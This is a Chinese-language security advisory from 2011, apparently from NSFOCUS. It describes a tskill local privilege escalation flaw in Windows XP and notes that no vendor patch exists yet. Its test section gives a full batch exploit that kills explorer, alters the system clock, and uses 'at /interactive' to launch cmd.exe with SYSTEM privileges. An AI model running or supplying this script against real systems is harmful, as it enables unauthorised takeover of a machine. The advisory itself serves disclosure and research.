安全研究

安全漏洞
Microsoft Windows "tskill"本地权限提升漏洞

发布日期:2011-06-13
更新日期:2011-06-13

受影响系统:
Microsoft Windows XP
描述:
BUGTRAQ  ID: 48232

Microsoft Windows是微软发布的非常流行的操作系统。

Microsoft Windows的tskill命令实现上存在本地权限提升漏洞,本地攻击者可利用此漏洞以系统级别的权限执行任意代码,造成完全控制受影响计算机。

<*来源:Todor Donev
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y


echo [*] Backup time
time < time.txt

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windowsxp/default.asp

浏览次数:2247
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客